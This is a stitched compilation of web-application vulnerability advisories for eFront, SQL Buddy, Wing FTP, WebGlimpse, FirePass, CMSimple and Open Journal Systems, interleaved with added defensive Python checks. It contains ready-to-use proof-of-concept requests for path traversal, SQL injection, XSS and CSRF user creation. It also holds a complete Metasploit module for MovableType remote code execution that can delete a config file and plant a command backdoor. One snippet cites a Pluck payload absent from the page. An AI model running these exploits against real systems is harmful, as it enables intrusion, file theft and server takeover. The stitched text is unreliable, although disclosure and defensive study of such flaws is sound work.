eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.
[+] Vulnerability Details
eFront 3.6.15 is prone to a PHP Object Injection vulnerability due to the unsafe use of the unserialize() function. A potential attacker, authenticated as a Professor, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input.
[+] Technical Details
A PHP Object Injection issue affects the copy.php script, which handles the copying of content between lessons, and others probably exist, due to the frequent use of deserialization operations on non-sanitized user input.
[!] File: libraries/includes/copy.php
-----------------------------
if ($_GET['transfered']) {
$transferedNodesCheck = unserialize($_GET['transfered']);
}
$copiedTests = array();
$copiedUnits = array();
$map = array();
foreach ($nodeOrders as $value) {
list($id, $parentContentId) = explode("-", $value);
if (!in_array($id, $transferedNodesCheck)) {
-----------------------------
The injection affects the "transfered" parameter.
[+] Proof of Concept (PoC)
[!] HTTP Request
-----------------------------
GET /test/efront/www/professor.php?ctg=copy&from=8&node_orders=&transfered=[SERIALIZED_ARBITRARY_OBJECT]&mode&ajax=ajax&csrf_id=6ebb0b3aee60a1764e780e8494985a8e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
X-Requested-With: XMLHttpRequest
Cookie: display_all_courses=1; setFormRowsHidden=0; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; SQLiteManager_currentLangue=2; PHPSESSID=6ebb0b3aee60a1764e780e8494985a8e; professor_sidebar=hidden; professor_sidebarMode=automatic; parent_sid=6ebb0b3aee60a1764e780e8494985a8e
-----------------------------
A common way to exploit this class of vulnerability is to find a PHP magic method that can be abused and inject a crafted object that triggers it. Although a deeper analysis has not been performed, no useful magic methods were identified for this specific vulnerability: because the unserialized input $transferedNodesCheck is used only inside an in_array() call, just __wakeup() and __destruct() could be reached, and none of the application's implementations of those lends itself to the purpose. The vulnerability could still be abused on a vulnerable PHP build (e.g., CVE-2014-8142, a use-after-free in unserialize()) to cause a denial of service, leak memory and, under certain conditions, execute code.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
eFront 3.6.15 Path Traversal Vulnerability
[+] Author: Filippo Roncari
[+] Target: eFront
[+] Version: 3.6.15 and probably lower
[+] Vendor: www.efrontlearning.net
[+] Accessibility: Remote
[+] Severity: High
[+] CVE: <requested>
[+] Full Advisory: https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf
[+] Info: f.roncari@securenetwork.it
[+] Summary
eFront is an open source Learning Management System (LMS) used to create and manage online training courses. From Wikipedia: “eFront is designed to assist with the creation of online learning communities while offering various opportunities for collaboration and interaction through an icon-based user interface. The platform offers tools for content creation, tests building, assignments management, reporting, internal messaging, forum, chat, surveys, calendar and others”.
[+] Vulnerability Details
eFront 3.6.15 is prone to a critical path traversal vulnerability involving the view_file.php module, due to improper user-input sanitization and unsafe logic in the inner normalize() function. Any unprivileged attacker could exploit this vulnerability by manipulating the HTTP parameter value in order to climb the directory tree and access arbitrary files on the remote file system. This issue can lead to critical confidentiality violations, depending on the privileges assigned to the application server.
[+] Technical Details
View full advisory at https://www.securenetwork.it/docs/advisory/SN-15-02_eFront.pdf for technical details and source code.
[+] Proof of Concept (PoC)
[!] PoC URL
-----------------------------
http://target.site/www/view_file.php?action=download&file=/[EFRONT_BASE_PATH]/../../../../../../etc/passwd/
_____________________________
[!] HTTP Request
-----------------------------
GET /test/efront/www/view_file.php?action=download&file=/Applications/MAMP/htdocs/test/efront/../../../../../etc/passwd/ HTTP/1.1
Host: localhost
Cookie: display_all_courses=1; PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; SQLiteManager_currentLangue=6;
PHPSESSID=d36bed784e063e65cf31721f8ec7a0bd; parent_sid=d36bed784e063e65cf31721f8ec7a0bd
-----------------------------
[!] HTTP Response
-----------------------------
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2015 13:20:43 GMT
Content-Description: File Transfer
Content-Disposition: attachment; filename="passwd"
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 5253
Content-Type: application/download
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
[...]
_____________________________
For technical details and explanations check the full advisory.
[+] Disclaimer
Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
# Exploit Title: Path traversal vulnerability
# Google Dork: intitle:path traversal
# Date: 05-08-2015
# Exploit Author: John Page (hyp3rlinx)
# Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.sqlbuddy.com
# Software Link: http://www.sqlbuddy.com
# Version: 1.3.3
# Tested on: windows 7
# Category: webapps
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt
Product:
===============================
SQL Buddy is an open source web based MySQL administration application.
Advisory Information:
==============================
SQL Buddy suffers from directory traversal: a user can move between
directories and read any PHP or non-PHP file (e.g. .doc, .txt, .xml,
.conf, .sql) by appending the '#' hash character when requesting files
via URL.
With '#' added as a delimiter, non-PHP files are returned and rendered,
subverting the .php concatenation SQL Buddy applies when requesting PHP
pages via the POST method.
Normal sqlbuddy request:
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>
POC exploit payloads:
=======================
1-Read from Apache restricted directory under htdocs:
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#
2-Read any arbitrary files that do not have .PHP extensions:
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#
3-Read phpinfo (no need for '#' as phpinfo is a PHP file):
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo
Severity Level:
===============
High
Request Method(s):
[+] POST
Vulnerable Product:
[+] sqlbuddy 1.3.3
Vulnerable Parameter(s):
[+] #page=somefile
Affected Area(s):
[+] Server directories & sensitive files
Solution - Fix & Patch:
=======================
N/A
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any
warranty. The security researcher John Page disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and fitness for a particular purpose. apparitionsec or its suppliers are
not liable in any case of damage, including direct, indirect, incidental
or consequential loss of business profits or special damages.
Domains: hyp3rlinx.altervista.org
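The three traversal reports on this page (Pluck's albums_getimage.php, eFront's view_file.php and SQL Buddy's page parameter) share one root cause: the path is checked, if at all, as a string before its '..' segments are collapsed. The Python 3 below is an added example, not code from any of those projects. It shows the kind of prefix check each payload slips past, and a resolver that normalises first and compares afterwards, with an optional suffix policy applied to the resolved name rather than the raw one. The base directories, the NUL check and the function names are assumptions; the three payloads are the ones from the PoCs above.

```python
import posixpath

def naive_is_inside(base, requested):
    """The check a traversal payload walks straight through: a string-prefix
    test on the raw parameter.  The eFront PoC begins with the base path
    itself, so it passes even though it resolves to /etc/passwd."""
    return requested.startswith(base)

def resolve_under(base, requested, allowed_suffixes=()):
    """Return the normalised absolute path if it stays under `base`, else None.

    Accepts absolute or relative input, treats backslashes as separators
    (Windows hosts, as in the Pluck PoC, accept both), collapses '.', '..'
    and a trailing '/', and only then compares against the base.  The
    suffix list is enforced on the resolved name, so a trailing '#' or a
    '.sql' name cannot dodge a '.php' policy.  This is pure string logic:
    on a real deployment resolve `base` with os.path.realpath first so a
    symlink beneath it cannot point outside."""
    if "\x00" in requested:                      # NUL truncates in C-backed file APIs
        return None
    requested = requested.replace("\\", "/")
    base = posixpath.normpath(base)
    if requested.startswith("/"):
        candidate = posixpath.normpath(requested)
    else:
        candidate = posixpath.normpath(posixpath.join(base, requested))
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    if allowed_suffixes and not candidate.endswith(tuple(allowed_suffixes)):
        return None
    return candidate

# Constructed base directories (assumptions) and the payloads from the PoCs.
EFRONT_BASE = "/Applications/MAMP/htdocs/test/efront"
EFRONT_PAYLOAD = EFRONT_BASE + "/../../../../../etc/passwd/"
SQLBUDDY_BASE = "/var/www/sqlbuddy"
SQLBUDDY_PAYLOAD = "../../../restricted/user_pwd.sql#"
PLUCK_BASE = "/xampp/htdocs/pluck-4_7/data/modules/albums"
PLUCK_PAYLOAD = "\\..\\..\\..\\..\\..\\..\\..\\Windows\\system.ini"

if __name__ == "__main__":
    print("naive check accepts eFront payload:", naive_is_inside(EFRONT_BASE, EFRONT_PAYLOAD))
    for base, req, suffixes in ((EFRONT_BASE, EFRONT_PAYLOAD, ()),
                                (SQLBUDDY_BASE, SQLBUDDY_PAYLOAD, (".php",)),
                                (PLUCK_BASE, PLUCK_PAYLOAD, ())):
        print("resolve_under ->", resolve_under(base, req, suffixes))
```

Note that the Pluck payload becomes an absolute path once its leading backslash is read as '/', which is exactly why the resolver must handle absolute input rather than assuming everything is relative to the base.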
# Exploit Title: CSRF add arbitrary users
# Google Dork:
# Date: 2015-04-28
# Exploit Author: John Page (hyp3rlinx)
#Website: hyp3rlinx.altervista.org/
# Vendor Homepage: http://www.wftpserver.com/serverhistory.htm
# Software Link: http://www.wftpserver.com/
# Version: 4.4.5
# Tested on: windows 7
# Category: webapps
Wing FTP Server Admin 4.4.5 - CSRF Vulnerability Add Users
Vendor:
http://www.wftpserver.com/serverhistory.htm
============================================
Release Date:
=============
2015-04-28
Source:
====================================
http://hyp3rlinx.altervista.org/advisories/AS-WFTP0328.txt
Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9
Product:
===============================
Wing FTP Server is a web-based administration FTP client that supports the
following protocols: FTP, FTPS, HTTPS and SSH.
Advisory Information:
==============================
A CSRF vulnerability in Wing FTP Server Admin allows arbitrary users to be
added to the system.
Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new version 4.4.6
April 28, 2015: Public Disclosure - John Page (hyp3rlinx)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
Request Method(s):
[+] POST
Vulnerable Product:
[+] Wing FTP Server Admin <= 4.4.5
Vulnerable Parameter(s):
[+] domain & type
Affected Area(s):
[+] Server Admin
Proof of Concept (POC):
=======================
The CSRF vulnerability can be exploited by remote attackers without a
privileged application user account and with low user interaction (a single click).
The payload adds arbitrary users to the system.
POC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF]
POC: Add arbitrary user:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E
Security Risk:
==============
The CSRF and client-side cross-site scripting vulnerability in the `domain`
parameter of admin_loglist.html has a CVSS score of 8.9.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as is, without any
warranty. The security researcher and reporter John Page disclaims all
warranties, either expressed or implied, including the warranties of
merchantability and capability for a particular purpose. apparitionsec or
its suppliers are not liable in any case of damage, including direct,
indirect, incidental or consequential loss of business profits or special
damages.
source: https://www.securityfocus.com/bid/52651/info
WebGlimpse is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to retrieve arbitrary files in the context of the application.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
WebGlimpse 2.18.7 is vulnerable; other versions may also be affected.
http://www.example.com/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
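The sqlbuddy `#page=` entries above and this WebGlimpse `DOC=` request share one defect: a file name taken from the request is joined onto a directory without being pinned to it. The resolver below is an added example, not code from either product; the web root `/srv/htdocs/sqlbuddy` and the `.php` allowlist are constructed assumptions, and the advisories' own payloads are run through the check.

```python
import os
from pathlib import Path, PurePosixPath


def resolve_page(base_dir, requested, allowed_suffixes=('.php',)):
    """Map a user-supplied page name onto a file under base_dir.

    Returns the absolute path as a string, or None when the request would
    escape base_dir or names a file type that must never be served.
    `requested` is the already URL-decoded parameter value.
    """
    # Treat backslashes as separators too: the sqlbuddy PoC targets XAMPP on Windows.
    candidate = requested.replace('\\', '/')
    if '\x00' in candidate or candidate.startswith('/'):
        return None                      # NUL truncation trick or an absolute path
    parts = PurePosixPath(candidate).parts
    if not parts or '..' in parts:
        return None                      # reject traversal segments outright
    if PurePosixPath(candidate).suffix.lower() not in allowed_suffixes:
        return None                      # only .php pages may be included
    base = Path(base_dir).resolve()
    target = (base / candidate).resolve()
    # Belt and braces: the resolved path must still sit under the web root
    # (this also catches symlinks inside the root that point outside it).
    if os.path.commonpath([str(base), str(target)]) != str(base):
        return None
    return str(target)


def check_payloads():
    """Run the advisories' traversal payloads and a benign name through the resolver."""
    base = '/srv/htdocs/sqlbuddy'        # constructed web root for this example
    return {
        'home.php': resolve_page(base, 'home.php'),
        'sqlbuddy-1': resolve_page(base, '../../../restricted/user_pwd.sql'),
        'sqlbuddy-2': resolve_page(base, '../../../directory/sensitive-file.conf'),
        'sqlbuddy-3': resolve_page(base, '../../../../xampp/phpinfo'),
        'webglimpse': resolve_page(base, '../../../../etc/passwd'),
    }
```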
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SixApart MovableType Storable Perl Code Execution',
      'Description' => %q{
        This module exploits a serialization flaw in MovableType before 5.2.12 to execute
        arbitrary code. The default nondestructive mode depends on the target server having
        the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.
        The destructive mode of operation uses only required MovableType dependencies,
        but it will noticeably corrupt the MovableType installation.
      },
      'Author' =>
        [
          'John Lightsey',
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2015-1592' ],
          [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],
        ],
      'Privileged' => false, # web server context
      'Payload' =>
        {
          'DisableNops' => true,
          'BadChars' => ' ',
          'Space' => 1024,
        },
      'Compat' =>
        {
          'PayloadType' => 'cmd'
        },
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Targets' => [['Automatic', {}]],
      'DisclosureDate' => 'Feb 11 2015',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'MovableType cgi-bin directory path', '/cgi-bin/mt/']),
        OptBool.new('DESTRUCTIVE', [true, 'Use destructive attack method (more likely to succeed, but corrupts target system.)', false])
      ], self.class
    )
  end
=begin
#!/usr/bin/perl
# generate config parameters for injection checks
use Storable;

{
  package XXXCHECKXXX;
  sub STORABLE_thaw {
    return 1;
  }
  sub STORABLE_freeze {
    return 1;
  }
}

my $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});
$frozen = unpack 'H*', $frozen;
print "LFI test for storable flaw is: $frozen\n";

{
  package DateTime;
  use overload '+' => sub { 'ignored' };
}
=end

  def check
    vprint_status("#{peer} - Sending storable test injection for XXXCHECKXXX.pm load failure")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step' => 'configure',
        'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
      }
    })
    unless res && res.code == 200 && res.body.include?("Can't locate XXXCHECKXXX.pm")
      vprint_status("#{peer} - Failed XXXCHECKXXX.pm load test")
      return Exploit::CheckCode::Safe
    end
    Exploit::CheckCode::Vulnerable
  end
  def exploit
    if datastore['DESTRUCTIVE'] == true
      exploit_destructive
    else
      exploit_nondestructive
    end
  end
=begin
#!/usr/bin/perl
# Generate nondestructive config parameter for RCE via Object::MultiType
# and Try::Tiny. The generated value requires minor modification to insert
# the payload inside the system() call and resize the padding.
use Storable;

{
  package Object::MultiType;
  use overload '+' => sub { 'ignored' };
}
{
  package Object::MultiType::Saver;
}
{
  package DateTime;
  use overload '+' => sub { 'ignored' };
}
{
  package Try::Tiny::ScopeGuard;
}

my $try_tiny_loader = bless {}, 'DateTime';
my $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';
my $multitype_coderef = bless \$multitype_saver, 'Object::MultiType';
my $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\n\n};system(q{});' . ('#' x 1025) . "\nexit;"], 'Try::Tiny::ScopeGuard';
my $data = [$try_tiny_loader, $try_tiny_executor];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE payload requiring Object::MultiType and DateTime: $frozen\n";
=end

  def exploit_nondestructive
    print_status("#{peer} - Using nondestructive attack method")
    config_payload = "53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b"
    config_payload << payload.encoded.unpack('H*')[0]
    config_payload << "7d293b"
    config_payload << "23" * (1025 - payload.encoded.length)
    config_payload << "0a657869743b"
    print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step' => 'configure',
        'config' => config_payload
      }
    }, 5)
  end
=begin
#!/usr/bin/perl
# Generate destructive config parameter to unlink mt-config.cgi
use Storable;

{
  package CGITempFile;
}

my $unlink_target = "mt-config.cgi";
my $cgitempfile = bless \$unlink_target, "CGITempFile";
my $data = [$cgitempfile];
my $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);
$frozen = unpack 'H*', $frozen;
print "RCE unlink payload requiring CGI: $frozen\n";
=end

  def exploit_destructive
    print_status("#{peer} - Using destructive attack method")

    # First we need to delete mt-config.cgi using the storable injection
    print_status("#{peer} - Sending storable injection to unlink mt-config.cgi")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'retry',
        'step' => 'configure',
        'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
      }
    })
    if res && res.code == 200
      print_status("Successfully sent unlink request")
    else
      fail_with(Failure::Unknown, "Error sending unlink request")
    end

    # Now we rewrite mt-config.cgi to accept a payload
    print_status("#{peer} - Rewriting mt-config.cgi to accept the payload")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),
      'vars_get' => {
        '__mode' => 'next_step',
        'step' => 'optional',
        'default_language' => 'en_us',
        'email_address_main' => "x\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\n\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1",
        'set_static_uri_to' => '/',
        'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',
      }
    })
    if res && res.code == 200
      print_status("Successfully sent mt-config rewrite request")
    else
      fail_with(Failure::Unknown, "Error sending mt-config rewrite request")
    end

    # Finally send the payload
    print_status("#{peer} - Sending payload request")
    send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'mt.cgi'),
      'vars_get' => {
        'xyzzy' => payload.encoded,
      }
    }, 5)
  end
end
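A defender-side check for the Storable injection the module above abuses, added here as an example and not part of the Metasploit module: it unwraps the `SERG` container the module's payloads use and lists the Perl classes the embedded Storable stream would bless values into, something a wizard `config` value has no reason to carry. Assumptions: the 4-byte word after the zero word is the serializer selector (3 in the module's Storable payloads, 2 in its native-format blob), and the opcode scan is a heuristic rather than a full Storable parser.

```python
import re

SX_BLESS = 0x11            # Storable opcode: bless the next value into a named class
SX_HOOK = 0x13             # Storable opcode: object of a class with STORABLE_thaw hooks
SHF_LARGE_CLASSLEN = 0x04  # SX_HOOK flag: class-name length is 4 bytes instead of 1
PKG_RE = re.compile(rb'^[A-Za-z_]\w*(?:::[A-Za-z_]\w*)*$')   # Perl package name


def parse_serg(hex_config):
    """Unwrap the 'SERG' container used by the module: (format_id, body)."""
    raw = bytes.fromhex(hex_config)
    if len(raw) < 12 or raw[:4] != b'SERG':
        raise ValueError('not a SERG-wrapped config value')
    # Assumption: the word after the zero word selects the serializer; the
    # module's Storable payloads carry 3, its native-format blob carries 2.
    return int.from_bytes(raw[8:12], 'big'), raw[12:]


def blessed_classes(body):
    """Heuristic scan (not a full Storable parser) for the class names that
    SX_BLESS and SX_HOOK records would bless deserialized values into."""
    found, i = [], 0
    while i < len(body):
        op = body[i]
        if op == SX_BLESS:
            hdr = 2          # opcode, 1-byte name length, then the name
        elif op == SX_HOOK and i + 1 < len(body) and (body[i + 1] & SHF_LARGE_CLASSLEN) == 0:
            hdr = 3          # opcode, flags, 1-byte name length, then the name
        else:
            i += 1
            continue
        n = body[i + hdr - 1] if i + hdr <= len(body) else 0
        name = body[i + hdr:i + hdr + n]
        if n and len(name) == n and PKG_RE.match(name):
            found.append(name.decode())
            i += hdr + n
        else:
            i += 1           # not a plausible class record; keep scanning
    return found


def suspicious_config(hex_config):
    """Flag a Storable-format config that carries blessed objects; the wizard's
    own blob (format 2 in the module) is plain key/value data with none."""
    fmt, body = parse_serg(hex_config)
    return fmt == 3 and bool(blessed_classes(body))


# The three complete 'config' values that appear in the module above.
CHECK_HEX = '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'
UNLINK_HEX = '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'
NATIVE_HEX = '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f'
```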
source: https://www.securityfocus.com/bid/52653/info
FirePass is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following versions of FirePass are affected:
6.0
6.0.1
6.0.2
6.0.2.3
6.0.3
6.1
7.0
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
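Both the Wing FTP `domain` payload earlier on this page and this FirePass `state` payload arrive percent-encoded, and the FirePass one is double-encoded (`%2527`), so a log review or WAF rule that decodes only once never sees the quote. Added example, not from either advisory: decode until the value stops changing, count the rounds, and record what surfaces; the Wing FTP input below is a shortened, constructed form of the advisory's value that keeps only its outer structure.

```python
import re
from urllib.parse import unquote_plus

SQL_FUNCS = re.compile(r'\b(benchmark|load_file|substring|sleep)\s*\(', re.I)
SCRIPT_TAG = re.compile(r'<\s*script\b', re.I)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, counting the rounds.
    '%2527' needs two rounds to become a quote; one round leaves '%27'."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_param(raw_value):
    """Classify one query-string parameter value the way a log review would."""
    decoded, rounds = fully_decode(raw_value)
    return {
        'decode_rounds': rounds,
        'sql_functions': sorted({m.group(1).lower() for m in SQL_FUNCS.finditer(decoded)}),
        'quote_injected': "'" in decoded,
        'script_tag': bool(SCRIPT_TAG.search(decoded)),
    }


# The FirePass 'state' payload from the advisory above, verbatim.
FIREPASS_STATE = ("%2527+and+(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+"
                  "BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+")
# Constructed, shortened form of the Wing FTP 'domain' payload (outer structure only).
WINGFTP_DOMAIN = "%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%22,%20%22post%22%29%3C/script%3E"
```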
source: https://www.securityfocus.com/bid/52661/info
CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
CMSimple 3.3 is vulnerable; other versions may also be affected.
http://www.example.com//cmsimple/cmsimplexh152/?'"</script><script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/52666/info
Open Journal Systems is prone to the following multiple vulnerabilities because the software fails to sufficiently sanitize user-supplied input:
1. An arbitrary-file-deletion vulnerability
2. A security vulnerability
3. An arbitrary-file-upload vulnerability
4. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to execute arbitrary script code, upload arbitrary files, and execute arbitrary code with administrative privileges. These issues may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Open Journal Systems 2.3.6 is vulnerable; other versions may also be affected.
On the submissions page URL:
http://www.example.com/index.php/[journal]/author/submit/3?articleId=[id]
the attacker adds malicious code to the "URL" field:
"><script>alert(document.cookie)</script>
The XSS will then be displayed here:
http://www.example.com/index.php/[submission]/author/submission/[id]